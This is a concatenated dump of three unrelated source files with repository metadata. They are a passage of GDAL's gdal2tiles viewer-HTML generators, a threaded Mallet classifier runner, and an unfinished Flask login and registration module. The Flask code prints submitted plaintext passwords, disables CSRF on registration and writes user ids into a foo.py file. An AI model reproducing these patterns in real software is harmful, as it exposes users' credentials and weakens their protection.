opacity = this.slide.left/CTransparencyLENGTH;
this.map.clearOverlays();
this.map.addOverlay(this.overlay, { zPriority: 0 });
if (this.map.getCurrentMapType() == G_HYBRID_MAP) {
this.map.addOverlay(hybridOverlay);
}
}
// This gets called by the API when addControl(new CTransparencyControl())
CTransparencyControl.prototype.initialize = function(map) {
var that=this;
this.map = map;
// Is this MSIE, if so we need to use AlphaImageLoader
var agent = navigator.userAgent.toLowerCase();
if ((agent.indexOf("msie") > -1) && (agent.indexOf("opera") < 1)){this.ie = true} else {this.ie = false}
// create the background graphic as a <div> containing an image
var container = document.createElement("div");
container.style.width="70px";
container.style.height="21px";
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
container.innerHTML = '<div style="height:21px; width:70px; ' +loader+ '" ></div>';
} else {
container.innerHTML = '<div style="height:21px; width:70px; background-image: url(http://www.maptiler.org/img/opacity-slider.png)" ></div>';
}
// create the knob as a GDraggableObject
// Handle transparent PNG files in MSIE
if (this.ie) {
var loader = "progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://www.maptiler.org/img/opacity-slider.png', sizingMethod='crop');";
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.overflow="hidden";
this.knob_img = document.createElement("div");
this.knob_img.style.height="21px";
this.knob_img.style.width="83px";
this.knob_img.style.filter=loader;
this.knob_img.style.position="relative";
this.knob_img.style.left="-70px";
this.knob.appendChild(this.knob_img);
} else {
this.knob = document.createElement("div");
this.knob.style.height="21px";
this.knob.style.width="13px";
this.knob.style.backgroundImage="url(http://www.maptiler.org/img/opacity-slider.png)";
this.knob.style.backgroundPosition="-70px 0px";
}
container.appendChild(this.knob);
this.slide=new GDraggableObject(this.knob, {container:container});
this.slide.setDraggableCursor('pointer');
this.slide.setDraggingCursor('pointer');
this.container = container;
// attach the control to the map
map.getContainer().appendChild(container);
// init slider
this.setSlider(this.opacity);
// Listen for the slider being moved and set the opacity
GEvent.addListener(this.slide, "dragend", function() {that.setOpacity()});
//GEvent.addListener(this.container, "click", function( x, y ) { alert(x, y) });
return container;
}
// Set the default position for the control
CTransparencyControl.prototype.getDefaultPosition = function() {
return new GControlPosition(G_ANCHOR_TOP_RIGHT, new GSize(7, 47));
}
/*
* Full-screen Window Resize
*/
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
// map.checkResize();
}
/*
* Main load function:
*/
function load() {
if (GBrowserIsCompatible()) {
// Bug in the Google Maps: Copyright for Overlay is not correctly displayed
var gcr = GMapType.prototype.getCopyrights;
GMapType.prototype.getCopyrights = function(bounds,zoom) {
return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom));
}
map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } );
map.addMapType(G_PHYSICAL_MAP);
map.setMapType(G_PHYSICAL_MAP);
map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds ));
hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] );
GEvent.addListener(map, "maptypechanged", function() {
if (map.getCurrentMapType() == G_HYBRID_MAP) {
map.addOverlay(hybridOverlay);
} else {
map.removeOverlay(hybridOverlay);
}
} );
var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom);
var mercator = new GMercatorProjection(mapMaxZoom+1);
tilelayer.getTileUrl = function(tile,zoom) {
if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) {
return "http://www.maptiler.org/img/none.png";
}
var ymax = 1 << zoom;
var y = ymax - tile.y -1;
var tileBounds = new GLatLngBounds(
mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ),
mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom )
);
if (mapBounds.intersects(tileBounds)) {
return zoom+"/"+tile.x+"/"+y+".png";
} else {
return "http://www.maptiler.org/img/none.png";
}
}
// IE 7-: support for PNG alpha channel
// Unfortunately, the opacity of the whole overlay is then not changeable
tilelayer.isPng = function() { return true;};
tilelayer.getOpacity = function() { return opacity; }
overlay = new GTileLayerOverlay( tilelayer );
map.addOverlay(overlay);
map.addControl(new GLargeMapControl());
map.addControl(new GHierarchicalMapTypeControl());
map.addControl(new CTransparencyControl( overlay ));
""" % args # noqa
if self.kml:
s += """
map.addMapType(G_SATELLITE_3D_MAP);
map.getEarthInstance(getEarthInstanceCB);
"""
s += """
map.enableContinuousZoom();
map.enableScrollWheelZoom();
map.setMapType(G_HYBRID_MAP);
}
resize();
}
"""
if self.kml:
s += """
function getEarthInstanceCB(object) {
var ge = object;
if (ge) {
var url = document.location.toString();
url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml';
var link = ge.createLink("");
if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") }
else { link.setHref(url) };
var networkLink = ge.createNetworkLink("");
networkLink.setName("TMS Map Overlay");
networkLink.setFlyToView(true);
networkLink.setLink(link);
ge.getFeatures().appendChild(networkLink);
} else {
// alert("You should open a KML in Google Earth");
// add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML?
}
}
""" % args # noqa
s += """
onresize=function(){ resize(); };
//]]>
</script>
</head>
<body onload="load()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
</body>
</html>
""" % args # noqa
return s
def generate_leaflet(self):
"""
Template for leaflet.html implementing overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title.replace('"', '\\"')
args['htmltitle'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
args['centerlon'] = (args['north'] + args['south']) / 2.
args['centerlat'] = (args['west'] + args['east']) / 2.
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['beginzoom'] = self.tmaxz
args['tile_size'] = self.tile_size # not used
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url # not used
args['copyright'] = self.options.copyright.replace('"', '\\"')
s = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' />
<title>%(htmltitle)s</title>
<!-- Leaflet -->
<link rel="stylesheet" href="https://unpkg.com/[email protected]/dist/leaflet.css" />
<script src="https://unpkg.com/[email protected]/dist/leaflet.js"></script>
<style>
body { margin:0; padding:0; }
body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; }
#map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */
.ctl {
padding: 2px 10px 2px 10px;
background: white;
background: rgba(255,255,255,0.9);
box-shadow: 0 0 15px rgba(0,0,0,0.2);
border-radius: 5px;
text-align: right;
}
.title {
font-size: 18pt;
font-weight: bold;
}
.src {
font-size: 10pt;
}
</style>
</head>
<body>
<div id="map"></div>
<script>
/* **** Leaflet **** */
// Base layers
// .. OpenStreetMap
var osm = L.tileLayer('http://{s}.tile.osm.org/{z}/{x}/{y}.png', {attribution: '© <a href="http://osm.org/copyright">OpenStreetMap</a> contributors', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. CartoDB Positron
var cartodb = L.tileLayer('http://{s}.basemaps.cartocdn.com/light_all/{z}/{x}/{y}.png', {attribution: '© <a href="http://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, © <a href="http://cartodb.com/attributions">CartoDB</a>', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. OSM Toner
var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.', minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// .. White background
var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg==", {minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// Overlay layers (TMS)
var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {tms: true, opacity: 0.7, attribution: "%(copyright)s", minZoom: %(minzoom)s, maxZoom: %(maxzoom)s});
// Map
var map = L.map('map', {
center: [%(centerlon)s, %(centerlat)s],
zoom: %(beginzoom)s,
minZoom: %(minzoom)s,
maxZoom: %(maxzoom)s,
layers: [osm]
});
var basemaps = {"OpenStreetMap": osm, "CartoDB Positron": cartodb, "Stamen Toner": toner, "Without background": white}
var overlaymaps = {"Layer": lyr}
// Title
var title = L.control();
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl title');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = "%(title)s";
};
title.addTo(map);
// Note
var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>';
var title = L.control({position: 'bottomleft'});
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl src');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = src;
};
title.addTo(map);
// Add base layers
L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map);
// Fit to overlay bounds (SW and NE points with (lat, lon))
map.fitBounds([[%(south)s, %(east)s], [%(north)s, %(west)s]]);
</script>
</body>
</html>
""" % args # noqa
return s
def generate_openlayers(self):
"""
Template for openlayers.html, with the tiles as overlays, and base layers.
It returns filled string.
"""
args = {}
args['title'] = self.options.title
args['bingkey'] = self.options.bingkey
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
if self.options.xyz:
args['sign_y'] = ''
else:
args['sign_y'] = '-'
args['ominx'] = self.ominx
args['ominy'] = self.ominy
args['omaxx'] = self.omaxx
args['omaxy'] = self.omaxy
args['center_x'] = (self.ominx + self.omaxx) / 2
args['center_y'] = (self.ominy + self.omaxy) / 2
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(title)s</title>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 90%%; border: 1px solid #888; }
</style>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/openlayers/openlayers.github.io@master/en/v6.3.1/css/ol.css" type="text/css">
<script src="https://cdn.jsdelivr.net/gh/openlayers/openlayers.github.io@master/en/v6.3.1/build/ol.js"></script>
<script src="https://unpkg.com/[email protected]"></script>
<link rel="stylesheet" href="https://unpkg.com/[email protected]/src/ol-layerswitcher.css" />
</head>
<body>
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="https://gdal.org/programs/gdal2tiles.html">GDAL2Tiles</a> </div>
<div id="map" class="map"></div>
<div id="mouse-position"></div>
<script type="text/javascript">
var mousePositionControl = new ol.control.MousePosition({
className: 'custom-mouse-position',
target: document.getElementById('mouse-position'),
undefinedHTML: ' '
});
var map = new ol.Map({
controls: ol.control.defaults().extend([mousePositionControl]),
target: 'map',
""" % args
if self.options.profile == 'mercator' or self.options.profile == 'geodetic':
s += """
layers: [
new ol.layer.Group({
title: 'Base maps',
layers: [
new ol.layer.Tile({
title: 'OpenStreetMap',
type: 'base',
visible: true,
source: new ol.source.OSM()
}),
new ol.layer.Tile({
title: 'Bing Roads',
type: 'base',
visible: false,
source: new ol.source.BingMaps({
key: "%(bingkey)s",
imagerySet: 'Road'
})
}),
new ol.layer.Tile({
title: 'Bing Aerial',
type: 'base',
visible: false,
source: new ol.source.BingMaps({
key: "%(bingkey)s",
imagerySet: 'Aerial'
})
}),
new ol.layer.Tile({
title: 'Bing Hybrid',
type: 'base',
visible: false,
source: new ol.source.BingMaps({
key: "%(bingkey)s",
imagerySet: 'AerialWithLabels'
})
}),
]
}),""" % args # noqa
if self.options.profile == 'mercator':
s += """
new ol.layer.Group({
title: 'Overlay',
layers: [
new ol.layer.Tile({
title: 'Overlay',
// opacity: 0.7,
extent: [%(ominx)f, %(ominy)f,%(omaxx)f, %(omaxy)f],
source: new ol.source.XYZ({
attributions: '%(copyright)s',
minZoom: %(minzoom)d,
maxZoom: %(maxzoom)d,
url: './{z}/{x}/{%(sign_y)sy}.%(tileformat)s',
tileSize: [%(tile_size)d, %(tile_size)d]
})
}),
]
}),""" % args # noqa
elif self.options.profile == 'geodetic':
if self.options.tmscompatible:
base_res = 180. / self.tile_size
else:
base_res = 360. / self.tile_size
resolutions = [ base_res / 2**i for i in range(self.tmaxz+1) ]
args['resolutions'] = '[' + ','.join('%.18g' % res for res in resolutions) + ']'
if self.options.xyz:
args['origin'] = '[-180,90]'
args['y_formula'] = 'tileCoord[2]'
else:
args['origin'] = '[-180,-90]'
args['y_formula'] = '- 1 - tileCoord[2]'
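# With --xyz the grid origin set above is the top-left corner and rows grow
# downward, so tileCoord[2] is used as-is; the default TMS layout has a
# bottom-left origin, hence the flipped row formula '- 1 - tileCoord[2]'.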
s += """
new ol.layer.Group({
title: 'Overlay',
layers: [
new ol.layer.Tile({
title: 'Overlay',
// opacity: 0.7,
extent: [%(ominx)f, %(ominy)f,%(omaxx)f, %(omaxy)f],
source: new ol.source.TileImage({
attributions: '%(copyright)s',
projection: 'EPSG:4326',
minZoom: %(minzoom)d,
maxZoom: %(maxzoom)d,
tileGrid: new ol.tilegrid.TileGrid({
extent: [-180,-90,180,90],
origin: %(origin)s,
resolutions: %(resolutions)s,
tileSize: [%(tile_size)d, %(tile_size)d]
}),
tileUrlFunction: function(tileCoord) {
return ('./{z}/{x}/{y}.%(tileformat)s'
.replace('{z}', String(tileCoord[0]))
.replace('{x}', String(tileCoord[1]))
.replace('{y}', String(%(y_formula)s)));
},
})
}),
]
}),""" % args # noqa
elif self.options.profile == 'raster':
base_res = 2**(self.nativezoom) * self.out_gt[1]
resolutions = [ base_res / 2**i for i in range(self.tmaxz+1) ]
args['maxres'] = resolutions[self.tminz]
args['resolutions'] = '[' + ','.join('%.18g' % res for res in resolutions) + ']'
args['tilegrid_extent'] = '[%.18g,%.18g,%.18g,%.18g]' % (self.ominx, self.ominy, self.omaxx, self.omaxy)
if self.options.xyz:
args['origin'] = '[%.18g,%.18g]' % (self.ominx, self.omaxy)
args['y_formula'] = 'tileCoord[2]'
else:
args['origin'] = '[%.18g,%.18g]' % (self.ominx, self.ominy)
args['y_formula'] = '- 1 - tileCoord[2]'
s += """
layers: [
new ol.layer.Group({
title: 'Overlay',
layers: [
new ol.layer.Tile({
title: 'Overlay',
// opacity: 0.7,
source: new ol.source.TileImage({
attributions: '%(copyright)s',
tileGrid: new ol.tilegrid.TileGrid({
extent: %(tilegrid_extent)s,
origin: %(origin)s,
resolutions: %(resolutions)s,
tileSize: [%(tile_size)d, %(tile_size)d]
}),
tileUrlFunction: function(tileCoord) {
return ('./{z}/{x}/{y}.%(tileformat)s'
.replace('{z}', String(tileCoord[0]))
.replace('{x}', String(tileCoord[1]))
.replace('{y}', String(%(y_formula)s)));
},
})
}),
]
}),""" % args # noqa
else:
tms = tmsMap[self.options.profile]
base_res = tms.resolution
resolutions = [ base_res / 2**i for i in range(self.tmaxz+1) ]
args['maxres'] = resolutions[self.tminz]
args['resolutions'] = '[' + ','.join('%.18g' % res for res in resolutions) + ']'
args['matrixsizes'] = '[' + ','.join('[%d,%d]' % (tms.matrix_width << i, tms.matrix_height << i) for i in range(len(resolutions))) + ']'
if self.options.xyz:
args['origin'] = '[%.18g,%.18g]' % (tms.topleft_x, tms.topleft_y)
args['y_formula'] = 'tileCoord[2]'
else:
args['origin'] = '[%.18g,%.18g]' % (tms.topleft_x, tms.topleft_y - tms.resolution * tms.tile_size)
args['y_formula'] = '- 1 - tileCoord[2]'
args['tilegrid_extent'] = '[%.18g,%.18g,%.18g,%.18g]' % ( \
tms.topleft_x,
tms.topleft_y - tms.matrix_height * tms.resolution * tms.tile_size,
tms.topleft_x + tms.matrix_width * tms.resolution * tms.tile_size,
tms.topleft_y)
s += """
layers: [
new ol.layer.Group({
title: 'Overlay',
layers: [
new ol.layer.Tile({
title: 'Overlay',
// opacity: 0.7,
extent: [%(ominx)f, %(ominy)f,%(omaxx)f, %(omaxy)f],
source: new ol.source.TileImage({
attributions: '%(copyright)s',
minZoom: %(minzoom)d,
maxZoom: %(maxzoom)d,
tileGrid: new ol.tilegrid.TileGrid({
extent: %(tilegrid_extent)s,
origin: %(origin)s,
resolutions: %(resolutions)s,
sizes: %(matrixsizes)s,
tileSize: [%(tile_size)d, %(tile_size)d]
}),
tileUrlFunction: function(tileCoord) {
return ('./{z}/{x}/{y}.%(tileformat)s'
.replace('{z}', String(tileCoord[0]))
.replace('{x}', String(tileCoord[1]))
.replace('{y}', String(%(y_formula)s)));
},
})
}),
]
}),""" % args # noqa
s += """
],
view: new ol.View({
center: [%(center_x)f, %(center_y)f],""" % args # noqa
if self.options.profile in ('mercator', 'geodetic'):
args['view_zoom'] = args['minzoom']
if self.options.profile == 'geodetic' and self.options.tmscompatible:
args['view_zoom'] += 1
s += """
zoom: %(view_zoom)d,""" % args # noqa
else:
s += """
resolution: %(maxres)f,""" % args # noqa
if self.options.profile == 'geodetic':
s += """
projection: 'EPSG:4326',"""
elif self.options.profile != 'mercator':
if self.in_srs and self.in_srs.IsProjected() and self.in_srs.GetAuthorityName(None) == 'EPSG':
s += """
projection: new ol.proj.Projection({code: 'EPSG:%s', units:'m'}),""" % self.in_srs.GetAuthorityCode(None)
s += """
})
});"""
if self.options.profile in ('mercator', 'geodetic'):
s += """
map.addControl(new ol.control.LayerSwitcher());"""
s += """
</script>
</body>
</html>"""
return s
def generate_mapml(self):
if self.options.mapml_template:
template = self.options.mapml_template
else:
template = gdal.FindFile('gdal', 'template_tiles.mapml')
s = open(template, 'rb').read().decode('utf-8')
if self.options.profile == 'mercator':
tiling_scheme = 'OSMTILE'
elif self.options.profile == 'geodetic':
tiling_scheme = 'WGS84'
else:
tiling_scheme = self.options.profile
s = s.replace('${TILING_SCHEME}', tiling_scheme)
s = s.replace('${URL}', self.options.url if self.options.url else "./")
tminx, tminy, tmaxx, tmaxy = self.tminmax[self.tmaxz]
s = s.replace('${MINTILEX}', str(tminx))
s = s.replace('${MINTILEY}', str(GDAL2Tiles.getYTile(tmaxy, self.tmaxz, self.options)))
s = s.replace('${MAXTILEX}', str(tmaxx))
s = s.replace('${MAXTILEY}', str(GDAL2Tiles.getYTile(tminy, self.tmaxz, self.options)))
s = s.replace('${CURZOOM}', str(self.tmaxz))
s = s.replace('${MINZOOM}', str(self.tminz))
s = s.replace('${MAXZOOM}', str(self.tmaxz))
s = s.replace('${TILEEXT}', str(self.tileext))
return s
@staticmethod
def getYTile(ty, tz, options):
"""
Calculates the y-tile number based on whether XYZ or TMS (default) system is used
:param ty: The y-tile number
:param tz: The z-tile number
:return: The transformed y-tile number
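Example (hypothetical values): for the 'mercator' profile at zoom tz=3
there are 2**3 = 8 tile rows, so with --xyz a TMS row ty=1 maps to
(2**3 - 1) - 1 = 6; without --xyz the row is returned unchanged.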
"""
if options.xyz and options.profile != 'raster':
if options.profile in ('mercator', 'geodetic'):
return (2**tz - 1) - ty # Convert from TMS to XYZ numbering system
tms = tmsMap[options.profile]
return (tms.matrix_height * 2**tz - 1) - ty # Convert from TMS to XYZ numbering system
return ty
def worker_tile_details(input_file, output_folder, options):
gdal2tiles = GDAL2Tiles(input_file, output_folder, options)
gdal2tiles.open_input()
gdal2tiles.generate_metadata()
tile_job_info, tile_details = gdal2tiles.generate_base_tiles()
return tile_job_info, tile_details
class ProgressBar(object):
def __init__(self, total_items):
self.total_items = total_items
self.nb_items_done = 0
self.current_progress = 0
self.STEP = 2.5
def start(self):
sys.stdout.write("0")
def log_progress(self, nb_items=1):
self.nb_items_done += nb_items
progress = float(self.nb_items_done) / self.total_items * 100
if progress >= self.current_progress + self.STEP:
done = False
while not done:
if self.current_progress + self.STEP <= progress:
self.current_progress += self.STEP
if self.current_progress % 10 == 0:
sys.stdout.write(str(int(self.current_progress)))
if self.current_progress == 100:
sys.stdout.write("\n")
else:
sys.stdout.write(".")
else:
done = True
sys.stdout.flush()
def get_tile_swne(tile_job_info, options):
if options.profile == 'mercator':
mercator = GlobalMercator()
tile_swne = mercator.TileLatLonBounds
elif options.profile == 'geodetic':
geodetic = GlobalGeodetic(options.tmscompatible)
tile_swne = geodetic.TileLatLonBounds
elif options.profile == 'raster':
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
srs4326.SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER)
if tile_job_info.kml and tile_job_info.in_srs_wkt:
in_srs = osr.SpatialReference()
in_srs.SetAxisMappingStrategy(osr.OAMS_TRADITIONAL_GIS_ORDER)
in_srs.ImportFromWkt(tile_job_info.in_srs_wkt)
ct = osr.CoordinateTransformation(in_srs, srs4326)
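# The closure below derives a raster tile's bounds from the geotransform
# (pixel size scaled by 2**(tmaxz - z)), picks the row origin according to
# XYZ vs TMS numbering, and reprojects the corners to WGS84 when the source
# SRS is not already EPSG:4326, for use in the KML output.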
def rastertileswne(x, y, z):
pixelsizex = (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1])
west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tile_size * pixelsizex
east = west + tile_job_info.tile_size * pixelsizex
if options.xyz:
north = tile_job_info.out_geo_trans[3] - y * tile_job_info.tile_size * pixelsizex
south = north - tile_job_info.tile_size * pixelsizex
else:
south = tile_job_info.ominy + y * tile_job_info.tile_size * pixelsizex
north = south + tile_job_info.tile_size * pixelsizex
if not tile_job_info.is_epsg_4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
tile_swne = rastertileswne
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
else:
tile_swne = None
return tile_swne
def single_threaded_tiling(input_file, output_folder, options):
"""
Keep a single threaded version that stays clear of multiprocessing, for platforms that would not
support it
"""
if options.verbose:
print("Begin tiles details calc")
conf, tile_details = worker_tile_details(input_file, output_folder, options)
if options.verbose:
print("Tiles details calc complete.")
if not options.verbose and not options.quiet:
progress_bar = ProgressBar(len(tile_details))
progress_bar.start()
for tile_detail in tile_details:
create_base_tile(conf, tile_detail)
if not options.verbose and not options.quiet:
progress_bar.log_progress()
if getattr(threadLocal, 'cached_ds', None):
del threadLocal.cached_ds
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def multi_threaded_tiling(input_file, output_folder, options):
nb_processes = options.nb_processes or 1
# Make sure that all processes do not consume more than `gdal.GetCacheMax()`
gdal_cache_max = gdal.GetCacheMax()
gdal_cache_max_per_process = max(1024 * 1024, math.floor(gdal_cache_max / nb_processes))
set_cache_max(gdal_cache_max_per_process)
pool = Pool(processes=nb_processes)
if options.verbose:
print("Begin tiles details calc")
conf, tile_details = worker_tile_details(input_file, output_folder, options)
if options.verbose:
print("Tiles details calc complete.")
if not options.verbose and not options.quiet:
progress_bar = ProgressBar(len(tile_details))
progress_bar.start()
# TODO: gbataille - check the confs for which each element is an array... one useless level?
# TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..."
for _ in pool.imap_unordered(partial(create_base_tile, conf), tile_details, chunksize=128):
if not options.verbose and not options.quiet:
progress_bar.log_progress()
pool.close()
pool.join() # Jobs finished
# Set the maximum cache back to the original value
set_cache_max(gdal_cache_max)
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def main(argv):
# TODO: gbataille - use mkdtemp to work in a temp directory
# TODO: gbataille - debug intermediate tiles.vrt not produced anymore?
# TODO: gbataille - Refactor generate overview tiles to not depend on self variables
# For multiprocessing, we need to propagate the configuration options to
# the environment, so that forked processes can inherit them.
for i in range(len(argv)):
if argv[i] == '--config' and i + 2 < len(argv):
os.environ[argv[i+1]] = argv[i+2]
argv = gdal.GeneralCmdLineProcessor(argv)
if argv is None:
return
input_file, output_folder, options = process_args(argv[1:])
nb_processes = options.nb_processes or 1
if nb_processes == 1:
single_threaded_tiling(input_file, output_folder, options)
else:
multi_threaded_tiling(input_file, output_folder, options)
# vim: set tabstop=4 shiftwidth=4 expandtab:
if __name__ == '__main__':
sys.exit(main(sys.argv))
| gpl-3.0 | 3,414,157,871,314,064,000 | 40.622147 | 407 | 0.542697 | false | 3.807212 | false | false | false |
mespinozas/si | t3/t3loader.py | 1 | 1118 | import threading
import logging
import time
import os
logging.basicConfig( level=logging.DEBUG, format='[%(levelname)s] - %(threadName)-10s : %(message)s')
def worker(x):
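# Each worker thread shells out to Mallet: import the SVMlight training file
# for partition x, train one classifier per algorithm listed below, then
# classify the matching input file with each trained model.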
logging.debug('Started')
importer = 'bin/mallet import-svmlight --input archivoEntrenamiento%s.txt --output training%s.mallet' % (x,x)
#print importer
os.system(importer)
classifiers = ['NaiveBayes', 'DecisionTree', 'MaxEntL1', 'MaxEnt', 'BalancedWinnow', 'Winnow']
for j in range(len(classifiers)):
trainer = 'bin/mallet train-classifier --input training%s.mallet --output-classifier output%s_%s.classifier --trainer %s' % (x,x,classifiers[j],classifiers[j])
#print trainer
os.system(trainer)
classify = 'bin/mallet classify-file --input archivo%s.txt --output output%s_%s.txt --classifier output%s_%s.classifier' % (x,x,classifiers[j],x,classifiers[j])
#print classify
os.system(classify)
logging.debug('Stopping')
return
threads = list()
for i in range(1,11):
t = threading.Thread(target=worker, args=(i,))
threads.append(t)
t.start()
| gpl-2.0 | -8,920,960,298,645,710,000 | 30.942857 | 168 | 0.669946 | false | 3.259475 | false | false | false |
AndrewGoldstein/grasshopper | grasshopper/public/views.py | 1 | 2732 | # -*- coding: utf-8 -*-
"""Public section, including homepage and signup."""
from flask import Blueprint, flash, redirect, render_template, request, url_for, g
from flask_login import login_required, login_user, logout_user
from grasshopper.extensions import login_manager
from grasshopper.public.forms import LoginForm
from grasshopper.user.forms import RegisterForm
from grasshopper.user.models import User
from grasshopper.utils import flash_errors
blueprint = Blueprint('public', __name__, static_folder='../static')
@login_manager.user_loader
def load_user(user_id):
"""Load user by ID."""
return User.get_by_id(int(user_id))
@blueprint.route('/', methods=['GET', 'POST'])
def home():
"""Home page."""
form = LoginForm(request.form)
# Handle logging in
if request.method == 'POST':
if form.validate_on_submit():
login_user(form.user)
with open("foo.py", "w") as f:
f.write("X=" + str(form.user.id))
#flash('You are logged in.', 'success')
#redirect_url = request.args.get('next') or url_for('user.jumbo')
return redirect(url_for('user.jumbo'))
else:
flash_errors(form)
return render_template('users/testing2.html', form=form)
@blueprint.route('/logout/')
@login_required
def logout():
"""Logout."""
logout_user()
#flash('You are logged out.', 'info')
return redirect(url_for('public.home'))
@blueprint.route('/register/', methods=['GET', 'POST'])
def register():
"""Register new user."""
form = RegisterForm(request.form, csrf_enabled=False)
if form.validate_on_submit():
User.create(username=form.username.data, email=form.email.data, password=form.password.data, active=True)
print form.username.data
print form.email.data
print form.password.data
flash('Thank you for registering. You can now log in.', 'success')
return redirect(url_for('public.home'))
else:
flash_errors(form)
return render_template('public/register.html', form=form)
@blueprint.route('/about/')
def about():
"""About page."""
form = LoginForm(request.form)
return render_template('public/about.html', form=form)
"""
@blueprint.route('/db')
def dbtest():
try:
#User.create(username="aaaa", email="[email protected]", password="aaaa", active=True)
print "hey"
User.create(username='John1', email='[email protected]', password="aaaa1", active=True)
